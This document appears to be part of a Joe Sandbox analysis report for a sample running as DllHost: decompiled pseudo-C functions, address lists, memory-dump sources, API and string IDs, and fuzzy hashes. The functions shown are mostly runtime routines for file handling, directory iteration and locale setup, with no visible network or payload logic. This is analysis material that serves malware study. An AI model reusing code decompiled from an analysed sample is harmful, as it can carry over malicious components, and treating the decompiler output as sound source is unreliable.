				 *((intOrPtr*)(_t176 + 0x28)) = r14d;
				 *((long long*)(_t176 + 0x20)) = _t187;
				r9d = 0x100;
				_t75 = E00007FF77FF7191C64B0(_t173 + 0x80, _t187, _t166); // executed
				if (_t75 != 0) goto 0x191c4c3c;
				 *((long long*)(_t173 - 0x10)) = _t187;
				 *_t173 = _t187;
				 *((long long*)(_t173 + 8)) = 0xf;
				 *((char*)(_t173 - 0x10)) = _t75;
				if ( *((char*)(_t173 + 0x7f)) != 0) goto 0x191c4a60;
				E00007FF77FF7191BA9A0(_t173 - 0x10, _t173 + 0x80, 0);
				 *((intOrPtr*)(_t176 + 0x50)) =  *((intOrPtr*)(_t173 - 0x70));
				 *((intOrPtr*)(_t176 + 0x48)) =  *((intOrPtr*)(_t173 - 0x40));
				 *((intOrPtr*)(_t176 + 0x40)) =  *((intOrPtr*)(_t173 - 0x3c));
				 *((intOrPtr*)(_t176 + 0x38)) =  *((intOrPtr*)(_t173 - 0x38));
				 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t173 - 0x34));
				 *((intOrPtr*)(_t176 + 0x28)) =  *((intOrPtr*)(_t173 - 0x30));
				 *((intOrPtr*)(_t176 + 0x20)) =  *((intOrPtr*)(_t173 - 0x2c));
				E00007FF77FF7191C1070(__esi,  *((char*)(_t173 + 0x7f)), __rbx, _t173 + 0x10, _t173 - 0x10,  *((intOrPtr*)(_t173 - 0x68)),  *((intOrPtr*)(_t173 - 0x60)), _t185);
				_t154 =  *((intOrPtr*)(_t173 + 8));
				if (_t154 - 0x10 < 0) goto 0x191c4afe;
				_t137 =  *((intOrPtr*)(_t173 - 0x10));
				if (_t154 + 1 - 0x1000 < 0) goto 0x191c4af8;
				if ( *((intOrPtr*)(_t173 - 0x10)) -  *((intOrPtr*)(_t137 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c4c5f;
				0x191d23d0(_t172);
				if ( *((long long*)(_t173 + 0x20)) == 0) goto 0x191c4b84;
				_t129 =  *((intOrPtr*)(__rdx + 8));
				if (_t129 ==  *((intOrPtr*)(__rdx + 0x10))) goto 0x191c4b68;
				 *((long long*)(_t176 + 0x60)) = _t129;
				E00007FF77FF7191B9E00( *((intOrPtr*)(_t173 - 0x10)) -  *((intOrPtr*)(_t137 - 8)) + 0xfffffff8, _t129, _t129, _t173 + 0x10, _t170);
				E00007FF77FF7191B9E00( *((intOrPtr*)(_t173 - 0x10)) -  *((intOrPtr*)(_t137 - 8)) + 0xfffffff8, _t129, _t129 + 0x20, _t173 + 0x30, _t170);
				 *((long long*)(_t129 + 0x40)) =  *((intOrPtr*)(_t173 + 0x50));
				 *((long long*)(_t129 + 0x48)) =  *((intOrPtr*)(_t173 + 0x58));
				 *((intOrPtr*)(_t129 + 0x50)) =  *((intOrPtr*)(_t173 + 0x60));
				asm("movups xmm0, [ebp+0x64]");
				asm("movups [ebx+0x54], xmm0");
				asm("movsd xmm1, [ebp+0x74]");
				asm("movsd [ebx+0x64], xmm1");
				 *((long long*)(_t167 + 8)) =  *((long long*)(_t167 + 8)) + 0x70;
				_t88 = E00007FF77FF7191C6630( *((intOrPtr*)(_t173 + 0x58)));
				goto 0x191c4b89;
				E00007FF77FF7191C0010(_t88, _t97, _t167, _t129, _t173, _t173 + 0x10);
				_t90 = E00007FF77FF7191C6630( *((intOrPtr*)(_t173 + 0x58))); // executed
				goto 0x191c4b89;
				_t160 =  *((intOrPtr*)(_t173 + 0x48));
				if (_t160 - 0x10 < 0) goto 0x191c4bc0;
				if (_t160 + 1 - 0x1000 < 0) goto 0x191c4bbb;
				if ( *((intOrPtr*)(_t173 + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x30)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c4c36;
				0x191d23d0();
				 *((long long*)(_t173 + 0x40)) = _t187;
				 *((long long*)(_t173 + 0x48)) = 0xf;
				 *((char*)(_t173 + 0x30)) = 0;
				_t163 =  *((intOrPtr*)(_t173 + 0x28));
				if (_t163 - 0x10 < 0) goto 0x191c4c07;
				if (_t163 + 1 - 0x1000 < 0) goto 0x191c4c02;
				if ( *((intOrPtr*)(_t173 + 0x10)) -  *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x10)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191c4c36;
				0x191d23d0();
				if (0xffffffff == 0) goto 0x191c49f0;
				return E00007FF77FF7191D23B0(_t90, _t95,  *(_t173 + 0x180) ^ _t176);
			}
























                                                                                                                                                              0x7ff7191c49a0
                                                                                                                                                              0x7ff7191c49a0
                                                                                                                                                              0x7ff7191c49a0
                                                                                                                                                              0x7ff7191c49a5
                                                                                                                                                              0x7ff7191c49ae
                                                                                                                                                              0x7ff7191c49b6
                                                                                                                                                              0x7ff7191c49bd
                                                                                                                                                              0x7ff7191c49c7
                                                                                                                                                              0x7ff7191c49ce
                                                                                                                                                              0x7ff7191c49d1
                                                                                                                                                              0x7ff7191c49d8
                                                                                                                                                              0x7ff7191c49df
                                                                                                                                                              0x7ff7191c49e5
                                                                                                                                                              0x7ff7191c49f2
                                                                                                                                                              0x7ff7191c49ff
                                                                                                                                                              0x7ff7191c4a04
                                                                                                                                                              0x7ff7191c4a09
                                                                                                                                                              0x7ff7191c4a0e
                                                                                                                                                              0x7ff7191c4a13
                                                                                                                                                              0x7ff7191c4a18
                                                                                                                                                              0x7ff7191c4a2d
                                                                                                                                                              0x7ff7191c4a34
                                                                                                                                                              0x7ff7191c4a3a
                                                                                                                                                              0x7ff7191c4a3e
                                                                                                                                                              0x7ff7191c4a42
                                                                                                                                                              0x7ff7191c4a4a
                                                                                                                                                              0x7ff7191c4a68
                                                                                                                                                              0x7ff7191c4a75
                                                                                                                                                              0x7ff7191c4a7e
                                                                                                                                                              0x7ff7191c4a85
                                                                                                                                                              0x7ff7191c4a8c
                                                                                                                                                              0x7ff7191c4a93
                                                                                                                                                              0x7ff7191c4a9a
                                                                                                                                                              0x7ff7191c4aa1
                                                                                                                                                              0x7ff7191c4aa8
                                                                                                                                                              0x7ff7191c4abc
                                                                                                                                                              0x7ff7191c4ac2
                                                                                                                                                              0x7ff7191c4aca
                                                                                                                                                              0x7ff7191c4acf
                                                                                                                                                              0x7ff7191c4add
                                                                                                                                                              0x7ff7191c4af2
                                                                                                                                                              0x7ff7191c4af8
                                                                                                                                                              0x7ff7191c4b03
                                                                                                                                                              0x7ff7191c4b05
                                                                                                                                                              0x7ff7191c4b0d
                                                                                                                                                              0x7ff7191c4b0f
                                                                                                                                                              0x7ff7191c4b1b
                                                                                                                                                              0x7ff7191c4b29
                                                                                                                                                              0x7ff7191c4b32
                                                                                                                                                              0x7ff7191c4b3a
                                                                                                                                                              0x7ff7191c4b41
                                                                                                                                                              0x7ff7191c4b44
                                                                                                                                                              0x7ff7191c4b48
                                                                                                                                                              0x7ff7191c4b4c
                                                                                                                                                              0x7ff7191c4b51
                                                                                                                                                              0x7ff7191c4b56
                                                                                                                                                              0x7ff7191c4b5f
                                                                                                                                                              0x7ff7191c4b66
                                                                                                                                                              0x7ff7191c4b72
                                                                                                                                                              0x7ff7191c4b7b
                                                                                                                                                              0x7ff7191c4b82
                                                                                                                                                              0x7ff7191c4b89
                                                                                                                                                              0x7ff7191c4b91
                                                                                                                                                              0x7ff7191c4ba4
                                                                                                                                                              0x7ff7191c4bb9
                                                                                                                                                              0x7ff7191c4bbb
                                                                                                                                                              0x7ff7191c4bc0
                                                                                                                                                              0x7ff7191c4bc4
                                                                                                                                                              0x7ff7191c4bcc
                                                                                                                                                              0x7ff7191c4bd0
                                                                                                                                                              0x7ff7191c4bd8
                                                                                                                                                              0x7ff7191c4beb
                                                                                                                                                              0x7ff7191c4c00
                                                                                                                                                              0x7ff7191c4c02
                                                                                                                                                              0x7ff7191c4c09
                                                                                                                                                              0x7ff7191c4c35

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: Error, couln't get the current entry info
                                                                                                                                                              • API String ID: 3668304517-3073648769
                                                                                                                                                              • Opcode ID: f39cd5f6c6e9445401ecf0f5d990ba309ef7468262c8451be90907a770ac9d89
                                                                                                                                                              • Instruction ID: 4ef4171afd90219df24090cd04634c8f7d17c5f97822bc06c337fb8ca50d1cab
                                                                                                                                                              • Opcode Fuzzy Hash: f39cd5f6c6e9445401ecf0f5d990ba309ef7468262c8451be90907a770ac9d89
                                                                                                                                                              • Instruction Fuzzy Hash: 86D15E72618B858AEB10DF69E4402ADB7B1FB48BACF904221DE5D43799DF38D496D310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B3B50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E00007FF77FF7191B3B50(void* __edx, intOrPtr* __rcx, void* __r8, void* __r9, void* __r12, void* __r13, void* __r15) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* __r14;
				void* _t20;
				void* _t22;
				void* _t45;
				signed long long _t58;
				intOrPtr* _t63;
				void* _t66;
				long long _t67;
				void* _t68;
				void* _t74;

				_t71 = __r9;
				_t45 = __r9;
				_t74 = __r8;
				_t63 = __rcx;
				if ( *((long long*)(__rcx + 0x18)) - 8 < 0) goto 0x191b3b70;
				asm("o16 nop [eax+eax]");
				if ( *((short*)( *__rcx + 0xfffffffffffffffe)) != 0) goto 0x191b3b80;
				if (0xffffffff == 0) goto 0x191b3c96;
				if (0 !=  *((intOrPtr*)(__rcx + 0x10))) goto 0x191b3c96;
				 *((long long*)(_t68 + 0x20)) = _t67;
				 *((long long*)(_t68 + 0x30)) = _t67;
				 *((long long*)(_t68 + 0x38)) = 7;
				 *((short*)(_t68 + 0x20)) = 0;
				_t9 = _t67 + 1; // 0x1
				r8d = _t9;
				E00007FF77FF7191BA820(_t68 + 0x20, "*", __r8);
				E00007FF77FF7191B2F20(_t63, _t68 + 0x20, __r12, __r13, _t74, __r15);
				_t58 =  *((intOrPtr*)(_t68 + 0x38));
				if (_t58 - 8 < 0) goto 0x191b3c1d;
				_t50 =  *((intOrPtr*)(_t68 + 0x20));
				if (2 + _t58 * 2 - 0x1000 < 0) goto 0x191b3c18;
				if ( *((intOrPtr*)(_t68 + 0x20)) -  *((intOrPtr*)(_t50 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b3ca6;
				0x191d23d0();
				if ( *((long long*)(_t63 + 0x18)) - 8 < 0) goto 0x191b3c27;
				_t20 = E00007FF77FF7191D092C( *((intOrPtr*)(_t68 + 0x20)) -  *((intOrPtr*)(_t50 - 8)) + 0xfffffff8, _t45,  *_t63, _t74, _t66, _t45, _t71); // executed
				if (_t20 != 0) goto 0x191b3c78;
				if (E00007FF77FF7191B2EE0(_t20, _t45) == 0) goto 0x191b3c6b;
				_t22 = E00007FF77FF7191D08EC(); // executed
				if (_t22 != 0) goto 0x191b3c9b;
				if (E00007FF77FF7191B2EE0(_t22, _t45) != 0) goto 0x191b3c50;
				return 0;
			}
















                                                                                                                                                              0x7ff7191b3b50
                                                                                                                                                              0x7ff7191b3b5b
                                                                                                                                                              0x7ff7191b3b5e
                                                                                                                                                              0x7ff7191b3b63
                                                                                                                                                              0x7ff7191b3b6b
                                                                                                                                                              0x7ff7191b3b77
                                                                                                                                                              0x7ff7191b3b88
                                                                                                                                                              0x7ff7191b3b8d
                                                                                                                                                              0x7ff7191b3b97
                                                                                                                                                              0x7ff7191b3b9f
                                                                                                                                                              0x7ff7191b3ba4
                                                                                                                                                              0x7ff7191b3ba9
                                                                                                                                                              0x7ff7191b3bb2
                                                                                                                                                              0x7ff7191b3bb7
                                                                                                                                                              0x7ff7191b3bb7
                                                                                                                                                              0x7ff7191b3bc7
                                                                                                                                                              0x7ff7191b3bd5
                                                                                                                                                              0x7ff7191b3bdb
                                                                                                                                                              0x7ff7191b3be4
                                                                                                                                                              0x7ff7191b3bee
                                                                                                                                                              0x7ff7191b3bfd
                                                                                                                                                              0x7ff7191b3c12
                                                                                                                                                              0x7ff7191b3c18
                                                                                                                                                              0x7ff7191b3c22
                                                                                                                                                              0x7ff7191b3c30
                                                                                                                                                              0x7ff7191b3c37
                                                                                                                                                              0x7ff7191b3c46
                                                                                                                                                              0x7ff7191b3c56
                                                                                                                                                              0x7ff7191b3c5d
                                                                                                                                                              0x7ff7191b3c69
                                                                                                                                                              0x7ff7191b3c77

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __std_fs_directory_iterator_open
                                                                                                                                                              • String ID: .
                                                                                                                                                              • API String ID: 4007087469-248832578
                                                                                                                                                              • Opcode ID: 2f5e892a48fe68667af08fbc5c7df50fd3aabe593e27b48286c5039db61a2573
                                                                                                                                                              • Instruction ID: d733b1ca19154052f8098f7d97242168fcd8028f6247ff78ea853271574f7fdd
                                                                                                                                                              • Opcode Fuzzy Hash: 2f5e892a48fe68667af08fbc5c7df50fd3aabe593e27b48286c5039db61a2573
                                                                                                                                                              • Instruction Fuzzy Hash: 5131E622B09A4551FE11AF15F5443B8A272AB457F8F840231DE2E437D5DE3CE5DBA210
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D41CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7191D0F5E), ref: 00007FF7191D4210
                                                                                                                                                              • _purecall.KERNELBASE(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7191D0F5E), ref: 00007FF7191D4256
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHeader_purecall
                                                                                                                                                              • String ID: csm
                                                                                                                                                              • API String ID: 3555375236-1018135373
                                                                                                                                                              • Opcode ID: 28c39f7ba3a5f01c2c8a5cb10eab44ebbf15b1926e46a057239f19a5151be9cd
                                                                                                                                                              • Instruction ID: c0bf6fcc7196325124957e209367fe125104559d9898da127d38a74a15a396f2
                                                                                                                                                              • Opcode Fuzzy Hash: 28c39f7ba3a5f01c2c8a5cb10eab44ebbf15b1926e46a057239f19a5151be9cd
                                                                                                                                                              • Instruction Fuzzy Hash: 56112B32618B4582EB119F15F5842A9B7E1FB88B98F594230DF8C07794DF3CD59ADB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DC874 Relevance: 4.6, APIs: 3, Instructions: 112fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                              			E00007FF77FF7191DC874(long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24) {
				void* _v40;
				char _v88;
				long long _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				signed int _t15;
				void* _t19;
				long long _t34;
				long long _t36;
				void* _t58;

				_t44 = __rdx;
				_t34 = __rax;
				_a8 = __rbx;
				_a24 = __rsi;
				if (__rdx != 0) goto 0x191dc8b9;
				E00007FF77FF7191DC834(__rax);
				 *((intOrPtr*)(__rax)) = 0;
				E00007FF77FF7191DC854(__rax);
				 *((intOrPtr*)(__rax)) = 0x16;
				_t15 = E00007FF77FF7191DA5D8();
				goto 0x191dc969;
				r15d = 0x30;
				r8d = r15d;
				E00007FF77FF7191D4A30(_t15 | 0xffffffff, 0,  &_v88, __rdx, __r8);
				asm("movups xmm0, [ebp-0x30]");
				asm("movups xmm1, [ebp-0x20]");
				asm("movups [edi], xmm0");
				asm("movups xmm0, [ebp-0x10]");
				asm("movups [edi+0x10], xmm1");
				asm("movups [edi+0x20], xmm0");
				if (__rcx == 0) goto 0x191dc89a;
				_v104 = __rsi;
				_v112 = 0x2000000;
				r8d = _t58 - 0x29;
				r9d = 0;
				_v120 = 3;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				_t36 = _t34;
				if (_t34 == 0xffffffff) goto 0x191dc982;
				_t19 = E00007FF77FF7191DCA08(_t58 + 0x00000050 | 0xffffffff, _t36, __rcx, _t34, __rdx); // executed
				if (_t19 != 0) goto 0x191dc958;
				E00007FF77FF7191D4A30(_t19, 0,  &_v88, _t44, _t58);
				asm("movups xmm0, [ebp-0x30]");
				asm("movups xmm1, [ebp-0x20]");
				asm("movups [edi], xmm0");
				asm("movups xmm0, [ebp-0x10]");
				asm("movups [edi+0x10], xmm1");
				asm("movups [edi+0x20], xmm0");
				if (_t36 == 0xffffffff) goto 0x191dc967;
				CloseHandle(??);
				return 0xffffffff;
			}













                                                                                                                                                              0x7ff7191dc874
                                                                                                                                                              0x7ff7191dc874
                                                                                                                                                              0x7ff7191dc874
                                                                                                                                                              0x7ff7191dc879
                                                                                                                                                              0x7ff7191dc898
                                                                                                                                                              0x7ff7191dc89a
                                                                                                                                                              0x7ff7191dc89f
                                                                                                                                                              0x7ff7191dc8a1
                                                                                                                                                              0x7ff7191dc8a6
                                                                                                                                                              0x7ff7191dc8ac
                                                                                                                                                              0x7ff7191dc8b4
                                                                                                                                                              0x7ff7191dc8b9
                                                                                                                                                              0x7ff7191dc8c3
                                                                                                                                                              0x7ff7191dc8c8
                                                                                                                                                              0x7ff7191dc8cd
                                                                                                                                                              0x7ff7191dc8d1
                                                                                                                                                              0x7ff7191dc8d5
                                                                                                                                                              0x7ff7191dc8d8
                                                                                                                                                              0x7ff7191dc8dc
                                                                                                                                                              0x7ff7191dc8e0
                                                                                                                                                              0x7ff7191dc8e7
                                                                                                                                                              0x7ff7191dc8e9
                                                                                                                                                              0x7ff7191dc8f2
                                                                                                                                                              0x7ff7191dc8fa
                                                                                                                                                              0x7ff7191dc8fe
                                                                                                                                                              0x7ff7191dc901
                                                                                                                                                              0x7ff7191dc90c
                                                                                                                                                              0x7ff7191dc912
                                                                                                                                                              0x7ff7191dc91c
                                                                                                                                                              0x7ff7191dc927
                                                                                                                                                              0x7ff7191dc92e
                                                                                                                                                              0x7ff7191dc939
                                                                                                                                                              0x7ff7191dc93e
                                                                                                                                                              0x7ff7191dc945
                                                                                                                                                              0x7ff7191dc949
                                                                                                                                                              0x7ff7191dc94c
                                                                                                                                                              0x7ff7191dc950
                                                                                                                                                              0x7ff7191dc954
                                                                                                                                                              0x7ff7191dc95c
                                                                                                                                                              0x7ff7191dc961
                                                                                                                                                              0x7ff7191dc981

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateDriveFileHandleType_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2907017715-0
                                                                                                                                                              • Opcode ID: 00ac94945df965c1c1932a8d7c22c879af33a8772de4ebff3749b01465132cdf
                                                                                                                                                              • Instruction ID: 59b26cc0a62476c023a441a9d1c6f481df329167c8191e74ab75be42cfce72a7
                                                                                                                                                              • Opcode Fuzzy Hash: 00ac94945df965c1c1932a8d7c22c879af33a8772de4ebff3749b01465132cdf
                                                                                                                                                              • Instruction Fuzzy Hash: FC41E422E18A5146F714AF35A5045A8A7B0FB587B8F409730EF6D13AC2DF38E1DAD750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D9288 Relevance: 4.6, APIs: 3, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191D9288(intOrPtr* __rax, long long __rbx, long long __rcx, long long _a8, long long _a16) {
				long long _v24;
				void* _t15;

				_a16 = __rbx;
				_a8 = __rcx;
				_v24 = _t15 - 0x30;
				if (__rcx != 0) goto 0x191d92c2;
				E00007FF77FF7191DC854(__rax);
				 *__rax = 0x16;
				return E00007FF77FF7191DA5D8() | 0xffffffff;
			}





                                                                                                                                                              0x7ff7191d9288
                                                                                                                                                              0x7ff7191d928d
                                                                                                                                                              0x7ff7191d9297
                                                                                                                                                              0x7ff7191d92a2
                                                                                                                                                              0x7ff7191d92a4
                                                                                                                                                              0x7ff7191d92a9
                                                                                                                                                              0x7ff7191d92c1

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_local_unwind
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1677304287-0
                                                                                                                                                              • Opcode ID: e6ad5509793aef6e96d9c7b780b1ba83e9423562360b09d98bd8d315455bd54b
                                                                                                                                                              • Instruction ID: e7dff4f4978ea5dd5da2ebc1af14a633b1bc7888eb55cee76ea08d7aa6f1a334
                                                                                                                                                              • Opcode Fuzzy Hash: e6ad5509793aef6e96d9c7b780b1ba83e9423562360b09d98bd8d315455bd54b
                                                                                                                                                              • Instruction Fuzzy Hash: 42216D32A19E4691FE44FF14E4541B8B3B2AF95BACF840131D60E472D6DE2CE19AD320
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D1144 Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                              			E00007FF77FF7191D1144(void* __ecx, long long __rbx, long long __rsi, long long __rbp, char _a8, void* _a16, void* _a24, void* _a32) {
				signed long long _t32;
				long long _t35;
				intOrPtr _t40;
				signed long long _t41;
				signed long long _t45;
				void* _t51;
				void* _t53;
				signed long long _t64;

				_t32 = _t64;
				 *((long long*)(_t32 + 0x10)) = __rbx;
				 *((long long*)(_t32 + 0x18)) = __rbp;
				 *((long long*)(_t32 + 0x20)) = __rsi;
				sil = __ecx;
				E00007FF77FF7191D0D0C(0, _t32 + 8);
				_t40 =  *0x1921a948; // 0x208c970c0c0
				if (_t40 != 0) goto 0x191d1204;
				E00007FF77FF7191D1340(0, _t32);
				_t41 = _t32;
				E00007FF77FF7191D1370(_t32); // executed
				 *((intOrPtr*)(_t41 + 0x20)) = 0x3f;
				_t45 =  *(_t41 + 0x28);
				if (_t45 == 0x19201a8c) goto 0x191d11df;
				if (_t45 == 0) goto 0x191d11aa;
				E00007FF77FF7191D9C88(0, 0, _t41, _t51, _t53);
				 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
				if ( *0x19201a8c != 0) goto 0x191d11b2;
				0x191da670();
				 *(_t41 + 0x28) = _t32;
				if (_t32 == 0) goto 0x191d11df;
				E00007FF77FF7191D4380();
				 *0x1921a8f8 = _t41;
				 *0x191f94c0();
				_t35 =  *0x1921a8f8; // 0x208c970c0c0
				 *0x1921a928 = _t35;
				if (sil == 0) goto 0x191d121a;
				return E00007FF77FF7191D0D84( *0x191f94c0(),  &_a8);
			}











                                                                                                                                                              0x7ff7191d1144
                                                                                                                                                              0x7ff7191d1147
                                                                                                                                                              0x7ff7191d114b
                                                                                                                                                              0x7ff7191d114f
                                                                                                                                                              0x7ff7191d1158
                                                                                                                                                              0x7ff7191d1161
                                                                                                                                                              0x7ff7191d1167
                                                                                                                                                              0x7ff7191d1171
                                                                                                                                                              0x7ff7191d1179
                                                                                                                                                              0x7ff7191d117e
                                                                                                                                                              0x7ff7191d1184
                                                                                                                                                              0x7ff7191d1189
                                                                                                                                                              0x7ff7191d1190
                                                                                                                                                              0x7ff7191d119e
                                                                                                                                                              0x7ff7191d11a3
                                                                                                                                                              0x7ff7191d11a5
                                                                                                                                                              0x7ff7191d11aa
                                                                                                                                                              0x7ff7191d11b8
                                                                                                                                                              0x7ff7191d11c3
                                                                                                                                                              0x7ff7191d11c8
                                                                                                                                                              0x7ff7191d11cf
                                                                                                                                                              0x7ff7191d11da
                                                                                                                                                              0x7ff7191d11df
                                                                                                                                                              0x7ff7191d11f0
                                                                                                                                                              0x7ff7191d11f6
                                                                                                                                                              0x7ff7191d11fd
                                                                                                                                                              0x7ff7191d1207
                                                                                                                                                              0x7ff7191d123b

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2016263034-0
                                                                                                                                                              • Opcode ID: e111c58219c25ba23558f1c052d844fd2b320cad249f3338204538bf35e22dd1
